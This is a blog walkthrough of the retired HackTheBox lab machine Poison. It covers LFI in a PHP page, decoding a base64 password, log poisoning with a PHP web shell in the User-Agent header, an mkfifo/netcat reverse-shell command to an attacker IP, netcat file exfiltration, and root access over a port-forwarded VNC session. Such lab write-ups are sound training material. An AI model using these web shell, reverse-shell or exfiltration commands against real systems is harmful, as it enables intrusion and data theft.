Poison HackTheBox WalkThrough

Poison HackTheBox Walkthrough

This is Poison HackTheBox machine walkthrough and is also the 20th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Poison HTB machine in two different ways. Before starting let us know something about this machine. It is a FreeBSD box with IP address 10.10.10.84 and difficulty medium assigned by its maker.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Poison machine by pinging IP 10.10.10.84. If all goes correct then start hacking. As usual I started by scanning the machine. Used Nmap [a port scanner] for this task and the result is below-

Scanning

$ sudo nmap -sC -sV -oA nmap/Poison 10.10.10.84

$ cat nmap/Poison.nmap

Performing Nmap scan during Poison HackTheBox Walkthrough

Nmap found ports 22 and 80 as open. OpenSSH on pot 22 and Apache2 webserver on port 80 are running. Enumeration on port 22 is useless here because OpenSSH 7.2 has not much vulnerability that can give us some information to help in further enumeration. So I began my enumeration from port 80. Also, port 80 has more attack surface to enumerate on than port 22. Ongoing to URL http://10.10.10.84/ found a website made entirely from HTML and php.

Poison web page

There are many php scripts given. After entering listfiles.php script into Scriptname field and submitting I found an array that contains many number of files. This array also contains a file pwdbackup.txt.

content of listfiles.php

When I accessed this file using the URL view source:http://10.10.10.84/browse.php?file=pwdbackup.txt it contains some base64 encoded characters along with a message it is encoded at least 13 times.

Content of pwdbackup.txt files shown during Poison HackTheBox Walkthrough

When I tried to decode it I got a password. To decode it, firstly copy whole encoded password in a file and then decode it 13 times.

$ nano encoded-passwd

$ base64 -d encoded-passwd | base64 -d | base64 -d | base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d

Decoding base64 text 13 times to get password of user charix

After decoding I got password Charix!2#4%6&8(0. Didn’t know whose password it is. We would try this password to login into SSH when we get some username. After some enumeration I got LFI vulnerability at URL http://10.10.10.84/browse.php?file=/etc/passwd. For more clear view check it’s source code as it is given in the screenshot. The passwd file revealed two users root and charix have shell. When I tried to SSH into charix account using the decoded credential I could easily logged in. So here our credential is charix : Charix!2#4%6&8(0.

Confirming LFI in Poison during its walkthrough

Let us SSH into charix’s account.

Getting User Shell via SSH ~ Method 1

$ ssh [email protected]

~Charix!2#4%6&8(0

% whoami && id

Getting user shell through SSH during Poison HackTheBox Walkthrough

We have successfully got user shell. Let us capture user flag.

Capture User Flag

% cat user.txt

Capturing user flag in Poison Walkthrough

Getting User Shell via Log Poisoning ~ Method 2

We have successfully got user flag. I am also going to get shell in other way and that one is probably the intended way. That is, by Log Poisoning and I think this is the reason the name of the Box is Poison. Before going further we should know what is log poisoning? So, when an attacker get LFI vulnerability he tries to upgrade it to RCE so that this attack can be more successful. For this he uses multiple techniques to get RCE and log poisoning is one of them. In Log poisoning an attacker attempts to inject malicious input to the server log and tries to access the log file via LFI vulnerability.

Since log file contains information of User-Agent and only user-agent header can be controlled by an attacker so he tries to replace the user-agent with his own php code as shown in below Request (this request is from http://10.10.10.84 ) . After sending the request when he checks log file he will find output of that code in it. For more info on LFI to RCE check this link.

Injecting php code in User-Agent header during Poison HackTheBox Walkthrough

We can access log file of Poison Web Server at URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log. As you can see our php code is executed and hello is printed in the log.

Access log file of Poison Webserver

Now let us include a cmd variable in our php code through which we can execute OS command to get Reverse Shell. Replace User-Agent with the following php code.

<?php system($_GET['cmd']) ?>  and forward the request from the Repeater.

Injecting php code 2 in User-Agent header during Poison HackTheBox Walkthrough

Confirming RCE

We can access URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id in browser to execute OS command. Simply replace id with required OS command and you will get its result at the bottom of this page. We can confirm this by the result of $id command at the bottom.

Access log file of Poison Webserver and confirming RCE on Poison Hackthebox machine

We have successfully confirmed RCE via log poisoning. To get reverse shell start netcat listener on your kali machine in one window and execute the following URL either in web browser or open it through $curl command as shown below.

Getting Reverse Shell

$ nc -nvlp 1234

$ whoami && id

$ curl http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.16%201234%20%3E/tmp/f

Getting user shell on Poison during its walkthrough

We have successfully got user shell. So this was the intended way to get into the box. Now exit this shell and login into SSH using creds charix: Charix!2#4%6&8(0 to get privilege escalation.

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege to root.

Finding PrivEsc Vector

At some initial enumeration I got a secret.zip file inside charix home directory. Then copied this file to my Kali machine so that I could unzip it and analyze its content. When I tried to extract this file it asked for password then entered Charix!2#4%6&8(0 and it extracted successfully. After extraction got a file secret. It is an extended-ASCII file. On checking its content with $cat it shows some unreadable characters. Didn’t know exactly what is use of this file. We will check this file later and would see where we will need this file.

Copying File locally to Kali Machine

% cat secret.zip | nc 10.10.14.16 1234 #On Poison Machine

$ nc -l -p 1234 > secret.zip < /dev/null #On Kali Machine

$ unzip secret.zip

~Charix!2#4%6&8(0

Copying secret.zip file locally to Kali Box

On checking LISTENING port on Poison machine I found port 5801 & 5901 are running locally. After some googling found 5801 & 5901 are VNC ports, for remote desktop access.

% netstat -an | grep "LISTEN"

Checking listening port on Poison Hackthebox machine during its walkthrough

Then confirmed Xvnc process is running using $ps command. Xvnc is a VNC server. This VNC server is running using root privilege. So here our potential PrivEsc vector can be using VNC.

% ps -aux | grep vnc

Checking Xvnc process

Since VNC connect to GUI Desktop so it is not possible to get GUI VNC shell through terminal. We have to local port forward port 5901 to our Kali machine to use VNC shell.

Local Port Forwarding

$ ssh -L 5901:127.0.0.1:5901 [email protected] # To perform Local Port Forwarding

~Charix!2#4%6&8(0

$ ss -lnpt # Check listening port on your Kali machine

Performing Local port forwarding on Poison htb

When I tried to connect to $vncviewer using the secret file at port 5901 it opened a VNC Desktop as you can see in the screenshot and that too with root user access. So we have successfully escalated the privilege to root. Let us capture root flag.

$ vncviewer -passwd secret 127.0.0.1:5901

Connecting to VNCviewer through password file secret in Poison Hackthebox Walkthrough

Capture root Flag

# whoami

# hostname

# id

# ls

# cat root.txt

Capturing root flag in Posion Htb

This was how I rooted to Poison HackTheBox machine. Hope you have learnt something new from this machine walkthrough. Thanks for reading this article. For any query and suggestion related to walkthrough feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/